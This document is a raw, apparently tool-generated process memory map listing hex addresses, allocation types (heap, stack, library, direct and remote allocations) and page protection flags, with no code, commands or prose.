trusted library allocation
page read and write
2062D000
stack
page read and write
24B8B000
trusted library allocation
page read and write
4740000
trusted library allocation
page execute and read and write
250D1000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
23E96000
trusted library allocation
page read and write
3469000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
266FC000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
4E2F000
stack
page read and write
249D0000
trusted library allocation
page read and write
20CFA000
trusted library allocation
page read and write
24942000
trusted library allocation
page read and write
23B45000
trusted library allocation
page read and write
ED000
trusted library allocation
page execute and read and write
2B7A000
heap
page read and write
208C0000
heap
page read and write
20280000
trusted library allocation
page read and write
27D000
trusted library allocation
page execute and read and write
1FC50000
trusted library allocation
page read and write
30C8000
heap
page read and write
23E89000
trusted library allocation
page read and write
23EFB000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
24680000
trusted library allocation
page read and write
26F24000
trusted library allocation
page read and write
236ED000
stack
page read and write
35DE000
stack
page read and write
245D8000
trusted library allocation
page read and write
47D000
stack
page read and write
239C9000
trusted library allocation
page read and write
23ECE000
trusted library allocation
page read and write
245FD000
trusted library allocation
page read and write
24C53000
trusted library allocation
page read and write
276E000
stack
page read and write
251B8000
trusted library allocation
page read and write
23A10000
trusted library allocation
page read and write
2A47000
trusted library allocation
page read and write
23B75000
trusted library allocation
page read and write
2B9B000
trusted library allocation
page read and write
190000
direct allocation
page read and write
24094000
trusted library allocation
page read and write
23B2C000
stack
page read and write
21D000
trusted library allocation
page execute and read and write
FB0000
trusted library allocation
page read and write
2478D000
trusted library allocation
page read and write
610E000
stack
page read and write | page guard
1EFF000
stack
page read and write
23B6D000
stack
page read and write
1FA0000
heap
page read and write
23F6B000
trusted library allocation
page read and write
245CD000
trusted library allocation
page read and write
833000
heap
page read and write
29B000
trusted library allocation
page execute and read and write
369C000
stack
page read and write
4E73000
heap
page read and write
20985000
heap
page read and write
24639000
trusted library allocation
page read and write
A65000
trusted library allocation
page execute and read and write
20340000
trusted library allocation
page read and write
830000
heap
page read and write
20280000
trusted library allocation
page read and write
262000
trusted library allocation
page read and write
2644B000
trusted library allocation
page read and write
23D14000
trusted library allocation
page read and write
2B4A000
heap
page read and write
240AB000
trusted library allocation
page read and write
A90000
heap
page read and write
5CB7000
stack
page read and write
20280000
trusted library allocation
page read and write
44D0000
direct allocation
page read and write
18A000
stack
page read and write
20280000
trusted library allocation
page read and write
260C9000
trusted library allocation
page read and write
3A7000
heap
page read and write
25215000
trusted library allocation
page read and write
23C54000
trusted library allocation
page read and write
23B09000
trusted library allocation
page read and write
25921000
trusted library allocation
page read and write
207E8000
heap
page read and write
23C08000
trusted library allocation
page read and write
2482E000
trusted library allocation
page read and write
247A5000
trusted library allocation
page read and write
1D30000
heap
page read and write
1FC30000
trusted library allocation
page read and write
264C2000
trusted library allocation
page read and write
25D58000
trusted library allocation
page read and write
E90000
trusted library allocation
page read and write
24090000
trusted library allocation
page read and write
529E000
stack
page read and write
4470000
trusted library allocation
page read and write
1F3E000
stack
page read and write
20010000
trusted library allocation
page read and write
2720000
trusted library allocation
page read and write
2505B000
trusted library allocation
page read and write
24F98000
trusted library allocation
page read and write
245E5000
trusted library allocation
page read and write
23D49000
trusted library allocation
page read and write
49E0000
direct allocation
page read and write
24FB2000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
239BB000
trusted library allocation
page read and write
1EFC000
stack
page read and write
1FD9E000
stack
page read and write
97E000
stack
page read and write | page guard
4D2000
heap
page read and write
2B6A000
heap
page read and write
21CE1000
trusted library allocation
page read and write
26BDE000
stack
page read and write
26639000
trusted library allocation
page read and write
208CF000
stack
page read and write
1FD10000
trusted library allocation
page read and write
1FF60000
trusted library allocation
page read and write
49F4000
heap
page read and write
10B000
stack
page read and write
1FCC0000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
20EEF000
trusted library allocation
page read and write
24644000
trusted library allocation
page read and write
26141000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
23C1B000
trusted library allocation
page read and write
1FE34000
heap
page read and write
ED0000
trusted library allocation
page read and write
24063000
trusted library allocation
page read and write
3469000
trusted library allocation
page read and write
4EDE000
stack
page read and write
A90000
trusted library allocation
page read and write
20060000
trusted library allocation
page read and write
2480000
heap
page read and write
BE0000
trusted library allocation
page read and write
24599000
trusted library allocation
page read and write
236000
heap
page read and write
2244B000
trusted library allocation
page read and write
25517000
trusted library allocation
page read and write
824000
heap
page read and write
4B46000
heap
page read and write
27AD000
trusted library allocation
page read and write
89000
stack
page read and write
249C8000
trusted library allocation
page read and write
26440000
trusted library allocation
page read and write
1FE3E000
stack
page read and write
4470000
trusted library allocation
page read and write
25594000
trusted library allocation
page read and write
20360000
trusted library allocation
page read and write
20D7B000
trusted library allocation
page read and write
26F51000
trusted library allocation
page read and write
23E42000
trusted library allocation
page read and write
26ED000
trusted library allocation
page read and write
3D0000
heap
page read and write
4A80000
heap
page execute and read and write
24B1D000
trusted library allocation
page read and write
2CF000
heap
page read and write
478D000
stack
page read and write
243C3000
trusted library allocation
page read and write
24C35000
trusted library allocation
page read and write
25C6E000
stack
page read and write
FCE000
stack
page read and write
23CBB000
trusted library allocation
page read and write
2412B000
trusted library allocation
page read and write
232DD000
stack
page read and write
20F0000
heap
page read and write
1FF90000
trusted library allocation
page read and write
25AE000
stack
page read and write
1FDF0000
trusted library allocation
page read and write
3D0000
trusted library allocation
page execute and read and write
5DEF000
stack
page read and write
2490000
trusted library allocation
page read and write
3441000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
2469D000
trusted library allocation
page read and write
511F000
stack
page read and write
23DEF000
trusted library allocation
page read and write
201BF000
stack
page read and write
2490C000
trusted library allocation
page read and write
238CE000
stack
page read and write
244E0000
trusted library allocation
page read and write
4B8D000
stack
page read and write
2557C000
trusted library allocation
page read and write
25245000
trusted library allocation
page read and write
22E14000
heap
page read and write
2468B000
trusted library allocation
page read and write
244B0000
trusted library allocation
page read and write
26191000
trusted library allocation
page read and write
233FC000
stack
page read and write
24C71000
trusted library allocation
page read and write
23BA4000
trusted library allocation
page read and write
376000
heap
page execute and read and write
23A58000
trusted library allocation
page read and write
4ABF000
stack
page read and write
24BEA000
trusted library allocation
page read and write
2492A000
trusted library allocation
page read and write
20C0E000
stack
page read and write | page guard
310000
trusted library allocation
page read and write
249E0000
trusted library allocation
page read and write
25B1E000
stack
page read and write
260000
trusted library allocation
page read and write
5FCE000
stack
page read and write
1FF70000
trusted library allocation
page read and write
57D000
heap
page read and write
2417B000
trusted library allocation
page read and write
150000
heap
page read and write
23ED8000
trusted library allocation
page read and write
1FC52000
trusted library allocation
page read and write
2B72000
heap
page read and write
251BD000
trusted library allocation
page read and write
A50000
heap
page execute and read and write
A40000
heap
page read and write
213000
trusted library allocation
page execute and read and write
243F2000
trusted library allocation
page read and write
B2F000
trusted library allocation
page read and write
4DBD000
heap
page read and write
2BA4000
heap
page read and write
25EEE000
trusted library allocation
page read and write
25414000
trusted library allocation
page read and write
239AE000
trusted library allocation
page read and write
990000
trusted library allocation
page read and write
426000
heap
page read and write
258C2000
trusted library allocation
page read and write
1FA000
trusted library allocation
page execute and read and write
1FC50000
trusted library allocation
page read and write
204FF000
stack
page read and write
3633000
trusted library allocation
page read and write
26CE000
stack
page read and write
872000
heap
page read and write
56D000
heap
page read and write
22CE2000
heap
page read and write
251E000
stack
page read and write
23BDD000
trusted library allocation
page read and write
2590000
trusted library allocation
page read and write
2459E000
trusted library allocation
page read and write
25389000
trusted library allocation
page read and write
4A20000
trusted library allocation
page read and write
25B2B000
trusted library allocation
page read and write
253E8000
trusted library allocation
page read and write
2609C000
trusted library allocation
page read and write
25CBD000
stack
page read and write
24989000
trusted library allocation
page read and write
203DC000
stack
page read and write
697000
heap
page read and write
310000
heap
page read and write
20220000
trusted library allocation
page read and write
854000
heap
page read and write
20060000
trusted library allocation
page execute and read and write
23878000
trusted library allocation
page read and write
21F4A000
trusted library allocation
page read and write
25D72000
trusted library allocation
page read and write
2C38000
trusted library allocation
page read and write
20350000
trusted library allocation
page read and write
486E000
stack
page read and write
214000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
206F0000
heap
page read and write
2DFE000
stack
page read and write
23F9B000
trusted library allocation
page read and write
23B8C000
trusted library allocation
page read and write
23CC7000
trusted library allocation
page read and write
24F21000
trusted library allocation
page read and write
25F0000
heap
page read and write
25C45000
trusted library allocation
page read and write
3B8000
heap
page read and write
4B35000
heap
page read and write
1FC53000
trusted library allocation
page read and write
2480000
heap
page read and write
80F000
stack
page read and write
24A77000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
5A9000
heap
page read and write
20061000
trusted library allocation
page read and write
295F000
trusted library allocation
page read and write
E3E000
stack
page read and write
25366000
trusted library allocation
page read and write
24A38000
trusted library allocation
page read and write
23E96000
trusted library allocation
page read and write
25477000
trusted library allocation
page read and write
24395000
trusted library allocation
page read and write
2F70000
heap
page read and write
20010000
trusted library allocation
page read and write
23D13000
trusted library allocation
page read and write
2353F000
stack
page read and write
23BDD000
trusted library allocation
page read and write
23F6B000
trusted library allocation
page read and write
23C07000
trusted library allocation
page read and write
24126000
trusted library allocation
page read and write
24327000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
2EAD000
trusted library allocation
page read and write
20B31000
heap
page read and write
202CF000
stack
page read and write
2B8F000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
2527D000
trusted library allocation
page read and write
99E000
stack
page read and write
4AE000
stack
page read and write | page guard
2F02000
trusted library allocation
page read and write
244DA000
trusted library allocation
page read and write
26196000
trusted library allocation
page read and write
1F3D000
stack
page read and write
2031F000
stack
page read and write
25998000
trusted library allocation
page read and write
23F2F000
trusted library allocation
page read and write
265DF000
trusted library allocation
page read and write
21DC000
remote allocation
page execute and read and write
20360000
trusted library allocation
page read and write
405C000
remote allocation
page execute and read and write
252000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
233DE000
stack
page read and write
E43000
trusted library allocation
page execute and read and write
1FC40000
trusted library allocation
page read and write
A92000
trusted library allocation
page read and write
252E3000
trusted library allocation
page read and write
24A68000
trusted library allocation
page read and write
7D23000
direct allocation
page execute and read and write
28E0000
heap
page read and write
5F30000
heap
page read and write
245AF000
trusted library allocation
page read and write
1FC3D000
trusted library allocation
page read and write
246BB000
trusted library allocation
page read and write
2B67000
heap
page read and write
1FC30000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
263B3000
trusted library allocation
page read and write
EE0000
trusted library allocation
page execute and read and write
1FFAF000
stack
page read and write
2480000
heap
page read and write
F10000
trusted library allocation
page read and write
2016E000
stack
page read and write
23C08000
trusted library allocation
page read and write
2063F000
stack
page read and write
624000
heap
page read and write
251F000
stack
page read and write
2441000
trusted library allocation
page read and write
23A4A000
trusted library allocation
page read and write
26608000
trusted library allocation
page read and write
24942000
trusted library allocation
page read and write
1FC52000
trusted library allocation
page read and write
2BCD000
heap
page read and write
21C89000
trusted library allocation
page read and write
23E1F000
trusted library allocation
page read and write
2852000
trusted library allocation
page read and write
25447000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
3E0000
trusted library allocation
page read and write
D0000
trusted library allocation
page read and write
245FD000
trusted library allocation
page read and write
4DC000
heap
page read and write
1FC50000
trusted library allocation
page read and write
538E000
stack
page read and write
25371000
trusted library allocation
page read and write
202000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
A98000
trusted library allocation
page read and write
254ED000
trusted library allocation
page read and write
23F3C000
trusted library allocation
page read and write
B19000
trusted library allocation
page read and write
F1C000
trusted library allocation
page read and write
260000
direct allocation
page read and write
2564E000
trusted library allocation
page read and write
24538000
trusted library allocation
page read and write
1C4000
heap
page read and write
25F1B000
trusted library allocation
page read and write
9FA000
heap
page read and write
3DE9000
heap
page read and write
158000
heap
page read and write
3C6000
heap
page read and write
25318000
trusted library allocation
page read and write
7AF000
stack
page read and write
1FF70000
trusted library allocation
page read and write
4FED000
stack
page read and write
24971000
trusted library allocation
page read and write
25F48000
trusted library allocation
page read and write
23B16000
trusted library allocation
page read and write
25A000
trusted library allocation
page execute and read and write
A20000
trusted library allocation
page read and write
247A5000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
24153000
trusted library allocation
page read and write
1CE0000
direct allocation
page read and write
1EB000
stack
page read and write
1FD5E000
stack
page read and write
2353E000
stack
page read and write | page guard
25160000
trusted library allocation
page read and write
25B43000
trusted library allocation
page read and write
4CA000
heap
page read and write
1FC50000
trusted library allocation
page read and write
2BD8000
heap
page read and write
728000
heap
page read and write
26169000
trusted library allocation
page read and write
24BDB000
trusted library allocation
page read and write
20281000
trusted library allocation
page read and write
248FB000
trusted library allocation
page read and write
24A99000
trusted library allocation
page read and write
60F000
heap
page read and write
20340000
trusted library allocation
page read and write
1FE0D000
heap
page read and write
20340000
trusted library allocation
page read and write
1FC5D000
trusted library allocation
page read and write
870000
trusted library allocation
page read and write
24176000
trusted library allocation
page read and write
249B0000
trusted library allocation
page read and write
3BE1000
heap
page read and write
1C0000
trusted library allocation
page read and write
4A15000
heap
page read and write
C60000
heap
page execute and read and write
23AD8000
trusted library allocation
page read and write
65C0000
heap
page read and write
2C07000
heap
page read and write
980000
heap
page execute and read and write
26F4C000
trusted library allocation
page read and write
5B5000
unkown
page readonly
1FFC0000
heap
page read and write
23D43000
trusted library allocation
page read and write
23BDF000
stack
page read and write
24A9E000
trusted library allocation
page read and write
243C7000
trusted library allocation
page read and write
23BF8000
trusted library allocation
page read and write
2077E000
stack
page read and write | page guard
880000
trusted library allocation
page execute and read and write
20220000
trusted library allocation
page read and write
46E000
heap
page read and write
25424000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
23DE3000
trusted library allocation
page read and write
4B17000
heap
page read and write
713000
heap
page read and write
4C50000
heap
page read and write
23C4A000
trusted library allocation
page read and write
1E70000
heap
page read and write
4470000
trusted library allocation
page read and write
10000
heap
page read and write
49F7000
heap
page read and write
20080000
trusted library allocation
page read and write
7B5000
heap
page read and write
2BFA000
heap
page read and write
264AA000
trusted library allocation
page read and write
4E1000
heap
page read and write
26E93000
trusted library allocation
page read and write
204A0000
heap
page execute and read and write
4A4E000
stack
page read and write
2BB8000
heap
page read and write
4594000
heap
page execute and read and write
47CA000
heap
page read and write
25680000
trusted library allocation
page read and write
20F4B000
trusted library allocation
page read and write
552000
heap
page read and write
25114000
trusted library allocation
page read and write
1B0000
heap
page read and write
20012000
heap
page read and write
25649000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
203B0000
trusted library allocation
page read and write
20350000
trusted library allocation
page read and write
4820000
direct allocation
page read and write
4470000
trusted library allocation
page read and write
2666D000
trusted library allocation
page read and write
23DCB000
trusted library allocation
page read and write
245B6000
trusted library allocation
page read and write
52FB000
stack
page read and write
240DB000
trusted library allocation
page read and write
26AE000
stack
page read and write
20280000
trusted library allocation
page read and write
409E000
stack
page read and write
10000
heap
page read and write
2384E000
stack
page read and write
20CFC000
trusted library allocation
page read and write
816000
heap
page read and write
26CF000
stack
page read and write
E9F000
trusted library allocation
page read and write
3ED000
stack
page read and write
4B38000
heap
page read and write
349000
heap
page read and write
2717000
trusted library allocation
page read and write
21144000
trusted library allocation
page read and write
960000
trusted library allocation
page read and write
1D4000
trusted library allocation
page read and write
26463000
trusted library allocation
page read and write
23BF3000
trusted library allocation
page read and write
23E45000
trusted library allocation
page read and write
25685000
trusted library allocation
page read and write
40E4000
heap
page read and write
82B000
heap
page read and write
25950000
trusted library allocation
page read and write
20B0C000
heap
page read and write
23DC0000
trusted library allocation
page read and write
31A000
heap
page read and write
243DB000
trusted library allocation
page read and write
23DA8000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
23C80000
trusted library allocation
page read and write
829000
heap
page read and write
2B7F000
heap
page read and write
2443A000
trusted library allocation
page read and write
5F34000
heap
page read and write
23A3D000
stack
page read and write
2A10000
heap
page read and write
5040000
heap
page read and write
668000
heap
page read and write
24077000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
2D9F000
stack
page read and write
30D3000
heap
page read and write
23FED000
trusted library allocation
page read and write
390F000
stack
page read and write
1FD10000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
20360000
trusted library allocation
page read and write
2016E000
stack
page read and write
EB0000
trusted library allocation
page read and write
20DC7000
trusted library allocation
page read and write
206EE000
stack
page read and write
24451000
trusted library allocation
page read and write
20CF6000
trusted library allocation
page read and write
6470000
heap
page read and write
1FC50000
trusted library allocation
page read and write
2F7000
heap
page read and write
1FD10000
trusted library allocation
page read and write
664000
trusted library allocation
page read and write
1C0000
direct allocation
page read and write
2039E000
stack
page read and write
17AC000
remote allocation
page execute and read and write
F50000
trusted library allocation
page read and write
3BF000
heap
page read and write
3441000
trusted library allocation
page read and write
25BDE000
stack
page read and write
460000
trusted library allocation
page read and write
2580000
trusted library allocation
page read and write
2548E000
trusted library allocation
page read and write
4D2000
heap
page read and write
6FD000
heap
page read and write
25840000
trusted library allocation
page read and write
280000
heap
page read and write
1FC30000
trusted library allocation
page read and write
20B00000
heap
page read and write
20C93000
trusted library allocation
page read and write
245EE000
trusted library allocation
page read and write
217E000
stack
page read and write
419F000
stack
page read and write
23B98000
trusted library allocation
page read and write
190000
direct allocation
page read and write
26EC0000
trusted library allocation
page read and write
7EF20000
trusted library allocation
page execute and read and write
25173000
trusted library allocation
page read and write
2BC0000
heap
page read and write
4FDF000
stack
page read and write
25295000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
246BB000
trusted library allocation
page read and write
245CD000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
F00000
direct allocation
page read and write
2531A000
trusted library allocation
page read and write
3DFC000
heap
page read and write
24AB6000
trusted library allocation
page read and write
20360000
trusted library allocation
page read and write
20D59000
trusted library allocation
page read and write
24153000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
24A47000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
203B0000
trusted library allocation
page read and write
25290000
trusted library allocation
page read and write
4B23000
heap
page read and write
23FA5000
trusted library allocation
page read and write
23E1F000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
249CA000
trusted library allocation
page read and write
26395000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
257AE000
trusted library allocation
page read and write
20360000
trusted library allocation
page read and write
23D0E000
stack
page read and write
20350000
trusted library allocation
page execute and read and write
440000
trusted library allocation
page read and write
24FDF000
trusted library allocation
page read and write
20350000
trusted library allocation
page read and write
24135000
trusted library allocation
page read and write
23DC0000
trusted library allocation
page read and write
A60000
trusted library allocation
page read and write
1C0000
heap
page read and write
25020000
trusted library allocation
page read and write
23BBC000
trusted library allocation
page read and write
26773000
trusted library allocation
page read and write
2276C000
trusted library allocation
page read and write
3844000
heap
page read and write
25487000
trusted library allocation
page read and write
5B5000
unkown
page readonly
5C0000
remote allocation
page read and write
2663E000
trusted library allocation
page read and write
23F83000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
A50000
trusted library allocation
page read and write
2325E000
stack
page read and write
4F3D000
stack
page read and write
20280000
trusted library allocation
page read and write
25863000
trusted library allocation
page read and write
2B9A000
heap
page read and write
E50000
trusted library allocation
page read and write
258AA000
trusted library allocation
page read and write
23F18000
trusted library allocation
page read and write
24580000
trusted library allocation
page read and write
5018000
heap
page read and write
1FBB0000
direct allocation
page read and write
23FD6000
trusted library allocation
page read and write
286000
trusted library allocation
page execute and read and write
3A7D000
stack
page read and write
24B1D000
trusted library allocation
page read and write
B0000
trusted library section
page read and write
4470000
trusted library allocation
page read and write
24CA5000
trusted library allocation
page read and write
25483000
trusted library allocation
page read and write
E61000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
20C7E000
stack
page read and write
1E0000
trusted library allocation
page read and write
23F73000
trusted library allocation
page read and write
16F0000
remote allocation
page execute and read and write
1FC51000
trusted library allocation
page read and write
3B7000
heap
page read and write
50EE000
stack
page read and write
1FC50000
trusted library allocation
page read and write
20283000
trusted library allocation
page read and write
4F3E000
stack
page read and write
10000
heap
page read and write
5F30000
heap
page read and write
25342000
trusted library allocation
page read and write
21148000
trusted library allocation
page read and write
2034E000
stack
page read and write
A96000
heap
page read and write
23C85000
trusted library allocation
page read and write
39F000
heap
page read and write
4B40000
heap
page read and write
3441000
trusted library allocation
page read and write
91E000
stack
page read and write
150000
remote allocation
page read and write
240AB000
trusted library allocation
page read and write
239B8000
trusted library allocation
page read and write
24AE5000
trusted library allocation
page read and write
243AB000
trusted library allocation
page read and write
6BA000
trusted library allocation
page read and write
3169000
heap
page read and write
23A4B000
trusted library allocation
page read and write
2C18000
heap
page read and write
20460000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
21FE9000
trusted library allocation
page read and write
251EA000
trusted library allocation
page read and write
22CC4000
heap
page read and write
4827000
heap
page read and write
23928000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
25A85000
trusted library allocation
page read and write
24A2F000
trusted library allocation
page read and write
4B8E000
stack
page read and write
534D000
stack
page read and write
9F0000
trusted library allocation
page execute and read and write
24F75000
trusted library allocation
page read and write
10000
heap
page read and write
1FABE000
stack
page read and write
244F1000
trusted library allocation
page read and write
24064000
trusted library allocation
page read and write
24018000
trusted library allocation
page read and write
88000
stack
page read and write
4C94000
heap
page read and write
3441000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
407000
heap
page read and write
47C0000
direct allocation
page read and write
EE8000
trusted library allocation
page read and write
4890000
heap
page read and write
20DAE000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
23B08000
trusted library allocation
page read and write
25DE000
stack
page read and write | page guard
20450000
trusted library allocation
page read and write
2114A000
trusted library allocation
page read and write
25085000
trusted library allocation
page read and write
24492000
trusted library allocation
page read and write
3102000
heap
page read and write
69E000
heap
page read and write
245F3000
trusted library allocation
page read and write
25626000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
2551D000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
49C0000
direct allocation
page read and write
E80000
direct allocation
page read and write
2677E000
stack
page read and write
26E66000
trusted library allocation
page read and write
12D000
trusted library allocation
page execute and read and write
24481000
trusted library allocation
page read and write
4FC0000
heap
page read and write
225E8000
trusted library allocation
page read and write
2456A000
trusted library allocation
page read and write
32B8000
heap
page read and write
24674000
trusted library allocation
page read and write
257E000
trusted library allocation
page read and write
25671000
trusted library allocation
page read and write
2441000
trusted library allocation
page read and write
265D8000
trusted library allocation
page read and write
252EF000
trusted library allocation
page read and write
4DAE000
stack
page read and write
2447B000
trusted library allocation
page read and write
2059E000
stack
page read and write
20230000
trusted library allocation
page read and write
45CF000
stack
page read and write
239B0000
trusted library allocation
page read and write
248D8000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
5E7000
heap
page read and write
24539000
trusted library allocation
page read and write
2540F000
trusted library allocation
page read and write
759000
trusted library allocation
page read and write
25150000
trusted library allocation
page read and write
49D0000
trusted library allocation
page read and write
23FCA000
trusted library allocation
page read and write
2B59000
trusted library allocation
page read and write
2ED8000
trusted library allocation
page read and write
256000
trusted library allocation
page execute and read and write
257C7000
trusted library allocation
page read and write
253FB000
trusted library allocation
page read and write
280000
heap
page read and write
4B1C000
heap
page read and write
24A8E000
trusted library allocation
page read and write
25590000
trusted library allocation
page read and write
2BA0000
heap
page read and write
23E89000
trusted library allocation
page read and write
20DC9000
trusted library allocation
page read and write
245000
trusted library allocation
page execute and read and write
239D2000
trusted library allocation
page read and write
5D9D000
stack
page read and write
247D8000
trusted library allocation
page read and write
61CE000
stack
page read and write
507E000
stack
page read and write
4E2000
heap
page read and write
1FC50000
trusted library allocation
page read and write
1D50000
heap
page read and write
2086E000
stack
page read and write
24018000
trusted library allocation
page read and write
AA3000
heap
page read and write
1FC30000
trusted library allocation
page read and write
257E000
trusted library allocation
page read and write
260000
heap
page read and write
30C3000
heap
page read and write
20280000
trusted library allocation
page read and write
23DD8000
trusted library allocation
page read and write
2542D000
trusted library allocation
page read and write
24761000
trusted library allocation
page read and write
252C0000
trusted library allocation
page read and write
23C9B000
trusted library allocation
page read and write
23F6E000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
24004000
trusted library allocation
page read and write
24685000
trusted library allocation
page read and write
47F0000
direct allocation
page read and write
20280000
trusted library allocation
page read and write
23EDD000
trusted library allocation
page read and write
2A5B000
trusted library allocation
page read and write
251E8000
trusted library allocation
page read and write
3921000
trusted library allocation
page read and write
4950000
heap
page execute and read and write
2180000
trusted library allocation
page read and write
23CD2000
trusted library allocation
page read and write
2500A000
trusted library allocation
page read and write
257B3000
trusted library allocation
page read and write
4500000
direct allocation
page read and write
24A6D000
trusted library allocation
page read and write
2E3D000
trusted library allocation
page read and write
22FB0000
heap
page execute and read and write
24B94000
trusted library allocation
page read and write
2492A000
trusted library allocation
page read and write
20CC0000
heap
page execute and read and write
FB0000
trusted library allocation
page read and write
2A10000
heap
page read and write
2F82000
trusted library allocation
page read and write
24313000
trusted library allocation
page read and write
2030A000
heap
page read and write
23BAF000
trusted library allocation
page read and write
2493A000
trusted library allocation
page read and write
41AC000
heap
page read and write
4BD8000
heap
page read and write
538E000
stack
page read and write | page guard
23C8B000
trusted library allocation
page read and write
24550000
trusted library allocation
page read and write
525E000
stack
page read and write
4120000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
2B83000
heap
page read and write
235FE000
stack
page read and write
5A5000
unkown
page readonly
20250000
trusted library allocation
page read and write
30B8000
heap
page read and write
23E18000
trusted library allocation
page read and write
270E5000
trusted library allocation
page read and write
20270000
trusted library allocation
page read and write
24838000
trusted library allocation
page read and write
23FB3000
trusted library allocation
page read and write
25130000
trusted library allocation
page read and write
4630000
heap
page read and write
22E32000
heap
page read and write
20D71000
trusted library allocation
page read and write
2063E000
stack
page read and write | page guard
20120000
trusted library allocation
page read and write
D0000
heap
page read and write
2522E000
trusted library allocation
page read and write
23F87000
trusted library allocation
page read and write
1FBD000
heap
page read and write
23C6D000
trusted library allocation
page read and write
253E2000
trusted library allocation
page read and write
26B2E000
stack
page read and write
4DA9000
heap
page read and write
B70000
trusted library allocation
page read and write
20FFE000
trusted library allocation
page read and write
3800000
heap
page read and write
24847000
trusted library allocation
page read and write
25535000
trusted library allocation
page read and write
247A8000
trusted library allocation
page read and write
228E9000
trusted library allocation
page read and write
23C39000
trusted library allocation
page read and write
2038C000
trusted library allocation
page read and write
21D09000
trusted library allocation
page read and write
26C58000
trusted library allocation
page read and write
24A00000
trusted library allocation
page read and write
4D0000
heap
page read and write
1FC31000
trusted library allocation
page read and write
200D0000
trusted library allocation
page read and write
249B9000
trusted library allocation
page read and write
2280C000
trusted library allocation
page read and write
20170000
direct allocation
page read and write
9E0000
trusted library allocation
page read and write
208D8000
trusted library allocation
page read and write
5A1000
unkown
page execute read
817000
heap
page read and write
540000
direct allocation
page read and write
1FC30000
trusted library allocation
page read and write
85E000
stack
page read and write
26F83000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
20AE0000
heap
page read and write
26A7E000
stack
page read and write
24CF000
stack
page read and write
253DC000
trusted library allocation
page read and write
100000
direct allocation
page read and write
24C7B000
trusted library allocation
page read and write
255A9000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
2481D000
trusted library allocation
page read and write
23AC0000
trusted library allocation
page read and write
2682D000
trusted library allocation
page read and write
24F09000
trusted library allocation
page read and write
22568000
trusted library allocation
page read and write
3596000
trusted library allocation
page read and write
23D02000
trusted library allocation
page read and write
FC0000
direct allocation
page read and write
23F8E000
trusted library allocation
page read and write
25400000
trusted library allocation
page read and write
23E42000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
289F000
trusted library allocation
page read and write
24C21000
trusted library allocation
page read and write
255DB000
trusted library allocation
page read and write
23FA6000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
265000
trusted library allocation
page execute and read and write
23F77000
trusted library allocation
page read and write
30FE000
heap
page read and write
249B9000
trusted library allocation
page read and write
B5E000
stack
page read and write
2264B000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
239DC000
stack
page read and write
24B5C000
trusted library allocation
page read and write
2331E000
stack
page read and write
23BD4000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
23CA3000
trusted library allocation
page read and write
23CFA000
trusted library allocation
page read and write
24187000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
45EC000
stack
page read and write
1FC30000
trusted library allocation
page read and write
25B5B000
trusted library allocation
page read and write
2362E000
stack
page read and write | page guard
25215000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
24A6A000
trusted library allocation
page read and write
20CA0000
heap
page execute and read and write
4E02000
heap
page read and write
4A30000
trusted library allocation
page execute and read and write
23C6C000
trusted library allocation
page read and write
51EF000
stack
page read and write
3DE1000
heap
page read and write
AA0000
heap
page read and write
20608000
heap
page read and write
24332000
trusted library allocation
page read and write
22F8E000
stack
page read and write
6AD000
heap
page read and write
2443A000
trusted library allocation
page read and write
202CF000
stack
page read and write
238000
trusted library allocation
page read and write
213000
trusted library allocation
page execute and read and write
2930000
trusted library allocation
page read and write
20848000
stack
page read and write
2E33000
trusted library allocation
page read and write
2404C000
trusted library allocation
page read and write
24656000
trusted library allocation
page read and write
4BEE000
stack
page read and write
2493C000
trusted library allocation
page read and write
2B3B000
heap
page read and write
825000
heap
page read and write
20360000
trusted library allocation
page read and write
23D90000
trusted library allocation
page read and write
24D3000
trusted library allocation
page read and write
